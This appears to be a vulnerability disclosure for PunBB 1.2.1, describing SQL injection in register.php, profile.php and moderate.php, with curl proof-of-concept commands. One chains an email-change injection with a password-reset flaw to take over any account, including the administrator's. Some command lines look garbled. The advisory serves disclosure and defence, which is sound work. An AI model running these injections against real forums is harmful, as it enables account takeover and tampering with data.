...
- Johannes Gumbel
================================================= SQL Injections in punbb-1.2.1 register.php ================================================= Description ----------- A remote attacker can cause register.php to execute arbitrary SQL statements by supplying malicous values to the language or email parameter. The email paramter is guarded by the function is_valid_email but this function doesn't do any real filtering and will pass any SQL statement that is formatted correctly. This also affects systems using the magic_quotes_gpc option in php.ini. Proof of concept ---------------- This example only demonstrates the vulnerability in the language paramter. curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@xxxxxxxxx --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer Will create a user with the language English, style Oxygen and ip 0.0.0.0.
======================================================= Multiple vulnerabilities in punbb-1.2.1 profile.php ======================================================= Description ----------- A remote attacker without an account can set the password of any user on the system to NULL, effectivley shuting them out of the system. A user on the system can also inject an arbitrary SQL statement using the change email feature. This has occured because of a fault in the is_valid_email function which returns true for strings that are not even close to being a valid email. This also affects systems using the magic_quotes_gpc option in php.ini. By combining these two an attacker with an account on the forum can change the password for any user to anything he/she wants to, gaining full access to the administrator account. Proof of concept ---------------- Examples of the damage the DoS attack and arbitrary SQL statement attacks can do on their own has been omitted. This is a demonstration of their power when combined. Assumptions for this particular example: - There is a user on the system with id 3 that has username/password set to 'sha'/'passwd'. - The cookie is valid for sha on system - The system supports sha1. - The new password for the id 2 account is supposed to be 'newpass'. curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx" http://target/profile.php?action=change_email\&id=3 This will push the sha1 encrypted password 'newpass' into every users activate_string field. All that needs to be done is pushing this field to the password field of any user we want using the other bug. curl http://target/profile.php?action=change_pass\&id=2\&key= Now the account with user id 2 has the password 'newpass' set.
============================================== SQL Injections in punbb-1.2.1 moderate.php ============================================== Description ----------- Improper handling of several arguments in moderate.php allows a malicious moderator (or admin) to inject arbitrary SQL statements. This also affects systems using the magic_quotes_gpc option in php.ini. Proof of concept ---------------- These examples will not do anything malicious or even cause the system to report an error. Instead they are crafted such that by simply adding a ; or ' just before the comment "-- this won't show" will cause the SQL query to crash demonstrating the injection is possible. Assumptions: - punbb_cookie contains identification of a moderator for forum with id 1. Attacks delete posts: curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1 Attacks move topics: curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1 Attacks delete topics: curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1 Attacks open/close: curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> target/moderate.php?fid=1
